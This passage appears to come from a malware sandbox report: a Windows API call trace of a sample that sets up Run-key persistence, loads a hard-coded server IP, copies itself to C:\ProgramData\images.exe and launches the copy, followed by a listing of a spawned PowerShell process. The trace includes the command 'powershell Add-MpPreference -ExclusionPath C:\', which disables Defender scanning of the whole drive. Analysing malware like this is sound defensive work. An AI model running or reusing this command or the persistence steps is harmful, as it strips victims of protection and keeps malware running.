Protect=0x4, Type=0x20000)) returned 0x1c [0289.604] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x36b0000 [0289.604] VirtualFree (lpAddress=0x36a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.605] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="L15UQINRPS" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS" [0289.605] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.606] lstrlenW (lpString="inst") returned 4 [0289.606] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0289.606] lstrlenW (lpString="inst") returned 4 [0289.606] lstrcpyW (in: lpString1=0x3690000, lpString2="inst" | out: lpString1="inst") returned="inst" [0289.606] lstrlenW (lpString="inst") returned 4 [0289.606] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0289.607] lstrcpyW (in: lpString1=0x36a0000, lpString2="inst" | out: lpString1="inst") returned="inst" [0289.607] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.608] lstrlenW (lpString="InitWindows") returned 11 [0289.608] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0289.608] lstrlenW (lpString="InitWindows") returned 11 [0289.608] lstrcpyW (in: lpString1=0x3690000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0289.608] lstrlenW (lpString="InitWindows") returned 11 [0289.608] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x36c0000 [0289.609] lstrcpyW (in: lpString1=0x36c0000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0289.609] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.610] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0289.610] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0289.610] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0289.610] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0289.610] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0289.610] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x36d0000 [0289.611] lstrcpyW (in: lpString1=0x36d0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0289.611] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x21cf950 | out: phkResult=0x21cf950*=0x0) returned 0x2 [0289.612] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0289.613] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x294 [0289.613] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x21cfd1c | out: lpWSAData=0x21cfd1c) returned 0 [0289.613] GetProcessHeap () returned 0x8a0000 [0289.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x32) returned 0x8aec00 [0289.613] lstrlenW (lpString="23.227.202.157") returned 14 [0289.613] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0289.613] lstrcpyW (in: lpString1=0x36e0000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0289.614] lstrlenW (lpString="images.exe") returned 10 [0289.614] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0289.614] lstrcpyW (in: lpString1=0x36f0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0289.614] lstrlenW (lpString="Images") returned 6 [0289.614] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3700000 [0289.614] lstrcpyW (in: lpString1=0x3700000, lpString2="Images" | out: lpString1="Images") returned="Images" [0289.615] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.615] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3710000 [0289.615] lstrcpyW (in: lpString1=0x3710000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0289.615] GetProcessHeap () returned 0x8a0000 [0289.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8c99c8 [0289.615] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3720000 [0289.616] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x21cfad8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0289.631] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0289.631] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0289.631] GetCurrentProcess () returned 0xffffffff [0289.631] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x21cf8c4 | out: TokenHandle=0x21cf8c4*=0x2a8) returned 1 [0289.631] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x14, TokenInformation=0x21cf8bc, TokenInformationLength=0x4, ReturnLength=0x21cf8c0 | out: TokenInformation=0x21cf8bc, ReturnLength=0x21cf8c0) returned 1 [0289.632] CloseHandle (hObject=0x2a8) returned 1 [0289.632] GetCurrentProcess () returned 0xffffffff [0289.632] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x21cf8c4 | out: TokenHandle=0x21cf8c4*=0x2a8) returned 1 [0289.632] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x14, TokenInformation=0x21cf8bc, TokenInformationLength=0x4, ReturnLength=0x21cf8c0 | out: TokenInformation=0x21cf8bc, ReturnLength=0x21cf8c0) returned 1 [0289.632] CloseHandle (hObject=0x2a8) returned 1 [0289.632] GetProcessHeap () returned 0x8a0000 [0289.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100) returned 0x8c9d38 [0289.632] GetProcessHeap () returned 0x8a0000 [0289.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100) returned 0x8c9e40 [0289.632] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8c9d38, nSize=0x100 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0289.632] WinExec (lpCmdLine="powershell Add-MpPreference -ExclusionPath C:\\", uCmdShow=0x0) returned 0x21 [0289.678] GetProcessHeap () returned 0x8a0000 [0289.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7d0) returned 0x8cc9f8 [0289.678] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8cc9f8, nSize=0x3e8 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0289.678] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0289.678] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3740000 [0289.679] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0289.679] lstrcpyW (in: lpString1=0x3740000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0289.679] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0289.679] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3750000 [0289.679] lstrcpyW (in: lpString1=0x3750000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0289.679] VirtualFree (lpAddress=0x3740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.680] GetProcessHeap () returned 0x8a0000 [0289.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8cc9f8 | out: hHeap=0x8a0000) returned 1 [0289.680] GetProcessHeap () returned 0x8a0000 [0289.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x8bff90 [0289.680] lstrlenA (lpString="xq.FBnvgi") returned 9 [0289.681] lstrlenA (lpString="xq.FBnvgi") returned 9 [0289.681] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x3740000 [0289.681] lstrcpyA (in: lpString1=0x3740000, lpString2="xq.FBnvgi" | out: lpString1="xq.FBnvgi") returned="xq.FBnvgi" [0289.681] lstrlenA (lpString="xq.FBnvgi") returned 9 [0289.681] lstrlenA (lpString="xq.FBnvgi") returned 9 [0289.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x3740000, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0289.681] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0289.681] lstrlenA (lpString="xq.FBnvgi") returned 9 [0289.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3740000, cbMultiByte=-1, lpWideCharStr=0x3760000, cchWideChar=22 | out: lpWideCharStr="xq.FBnvgi") returned 10 [0289.681] lstrlenW (lpString="xq.FBnvgi") returned 9 [0289.681] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0289.682] lstrlenW (lpString="xq.FBnvgi") returned 9 [0289.682] lstrcpyW (in: lpString1=0x3770000, lpString2="xq.FBnvgi" | out: lpString1="xq.FBnvgi") returned="xq.FBnvgi" [0289.682] lstrlenW (lpString="xq.FBnvgi") returned 9 [0289.682] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0289.682] lstrcpyW (in: lpString1=0x3780000, lpString2="xq.FBnvgi" | out: lpString1="xq.FBnvgi") returned="xq.FBnvgi" [0289.682] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.683] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.683] lstrlenW (lpString="xq.FBnvgi") returned 9 [0289.683] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0289.684] lstrcatW (in: lpString1="", lpString2="xq.FBnvgi" | out: lpString1="xq.FBnvgi") returned="xq.FBnvgi" [0289.684] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.684] VirtualFree (lpAddress=0x3740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.685] GetProcessHeap () returned 0x8a0000 [0289.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8bff90 | out: hHeap=0x8a0000) returned 1 [0289.685] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", Reserved=0x0, lpClass=0x0, dwOptions=0x1, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x21cf950, lpdwDisposition=0x21cf864 | out: phkResult=0x21cf950*=0x2a8, lpdwDisposition=0x21cf864*=0x1) returned 0x0 [0289.685] RegCloseKey (hKey=0x2a8) returned 0x0 [0289.686] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x21cf670, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0289.687] lstrlenW (lpString="C:\\ProgramData") returned 14 [0289.687] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3740000 [0289.688] lstrlenW (lpString="C:\\ProgramData") returned 14 [0289.688] lstrcpyW (in: lpString1=0x3740000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0289.688] lstrlenW (lpString="C:\\ProgramData") returned 14 [0289.688] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0289.688] lstrcpyW (in: lpString1=0x3770000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0289.688] VirtualFree (lpAddress=0x3740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.689] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\ProgramData" (normalized: "c:\\programdata"), psa=0x0) returned 183 [0289.689] lstrlenW (lpString="images.exe") returned 10 [0289.689] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3740000 [0289.689] lstrcpyW (in: lpString1=0x3740000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0289.689] lstrlenW (lpString="\\") returned 1 [0289.690] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0289.690] lstrlenW (lpString="\\") returned 1 [0289.690] lstrcpyW (in: lpString1=0x3780000, lpString2="\\" | out: lpString1="\\") returned="\\" [0289.690] lstrlenW (lpString="\\") returned 1 [0289.690] lstrlenW (lpString="C:\\ProgramData") returned 14 [0289.690] VirtualQuery (in: lpAddress=0x3770000, lpBuffer=0x21cf81c, dwLength=0x1c | out: lpBuffer=0x21cf81c*(BaseAddress=0x3770000, AllocationBase=0x3770000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0289.690] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0289.691] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.691] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0289.691] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.692] lstrlenW (lpString="images.exe") returned 10 [0289.692] lstrlenW (lpString="C:\\ProgramData\\") returned 15 [0289.692] VirtualQuery (in: lpAddress=0x3790000, lpBuffer=0x21cf82c, dwLength=0x1c | out: lpBuffer=0x21cf82c*(BaseAddress=0x3790000, AllocationBase=0x3790000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0289.692] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0289.693] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.693] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0289.693] VirtualFree (lpAddress=0x3740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.699] CopyFileW (lpExistingFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), lpNewFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), bFailIfExists=0) returned 0 [0289.702] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.703] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.703] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0289.703] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3740000 [0289.704] lstrcpyW (in: lpString1=0x3740000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0289.704] CreateProcessW (in: lpApplicationName="C:\\ProgramData\\images.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x21cf868*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x21cf8ac | out: lpCommandLine=0x0, lpProcessInformation=0x21cf8ac*(hProcess=0x2ac, hThread=0x2a8, dwProcessId=0xfb8, dwThreadId=0xfbc)) returned 1 [0289.759] VirtualFree (lpAddress=0x3740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.759] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.759] VirtualFree (lpAddress=0x3720000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.760] GetProcessHeap () returned 0x8a0000 [0289.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c99c8 | out: hHeap=0x8a0000) returned 1 [0289.760] VirtualFree (lpAddress=0x3710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.761] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.761] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.762] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.762] VirtualFree (lpAddress=0x36e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.763] GetProcessHeap () returned 0x8a0000 [0289.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8aec00 | out: hHeap=0x8a0000) returned 1 [0289.764] WSACleanup () returned 0 [0289.764] ReleaseMutex (hMutex=0x294) returned 0 [0289.764] CloseHandle (hObject=0x294) returned 1 [0289.764] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.765] GetProcessHeap () returned 0x8a0000 [0289.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca1e8 | out: hHeap=0x8a0000) returned 1 [0289.765] VirtualFree (lpAddress=0x3680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.766] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.766] VirtualFree (lpAddress=0x3670000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.766] VirtualFree (lpAddress=0x3660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.767] VirtualFree (lpAddress=0x3650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.767] GetProcessHeap () returned 0x8a0000 [0289.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8aeb80 | out: hHeap=0x8a0000) returned 1 [0289.768] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.768] VirtualFree (lpAddress=0x36c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.769] VirtualFree (lpAddress=0x36a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.769] VirtualFree (lpAddress=0x36d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.770] VirtualFree (lpAddress=0x36b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.771] GetProcessHeap () returned 0x8a0000 [0289.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9fe0 | out: hHeap=0x8a0000) returned 1 [0289.771] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.772] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.772] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.774] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.775] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.775] GetProcessHeap () returned 0x8a0000 [0289.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ae800 | out: hHeap=0x8a0000) returned 1 [0289.776] CoUninitialize () [0289.777] CoUninitialize () [0289.779] VirtualFree (lpAddress=0x8aa2e0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.780] VirtualFree (lpAddress=0x8a8f98, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.780] ReleaseMutex (hMutex=0x1a8) returned 0 [0289.780] CloseHandle (hObject=0x1a8) returned 1 [0289.780] VirtualFree (lpAddress=0x860000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.781] VirtualFree (lpAddress=0x850000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.781] VirtualFree (lpAddress=0x840000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.782] VirtualFree (lpAddress=0x830000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.783] VirtualFree (lpAddress=0x700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.783] VirtualFree (lpAddress=0x6f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.784] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] ReleaseMutex (hMutex=0x268) returned 0 [0289.785] CloseHandle (hObject=0x268) returned 1 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.785] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.786] VirtualFree (lpAddress=0x890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.787] VirtualFree (lpAddress=0x31f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.858] VirtualFree (lpAddress=0x2e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.859] VirtualFree (lpAddress=0x31e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.860] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.860] VirtualFree (lpAddress=0x880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.861] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.861] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.861] WSACleanup () returned 0 [0289.861] ReleaseMutex (hMutex=0x288) returned 0 [0289.861] CloseHandle (hObject=0x288) returned 1 [0289.861] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.862] WSACleanup () returned 0 [0290.015] ReleaseMutex (hMutex=0x270) returned 0 [0290.015] CloseHandle (hObject=0x270) returned 1 [0290.015] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0290.016] ReleaseMutex (hMutex=0x28c) returned 0 [0290.016] CloseHandle (hObject=0x28c) returned 1 [0290.016] ExitProcess (uExitCode=0x0) Process: id = "15" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x6fa70000" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xfa0" cmd_line = "powershell Add-MpPreference -ExclusionPath C:\\" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1885 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1886 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1887 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1888 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1889 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1890 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1891 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1892 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1893 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 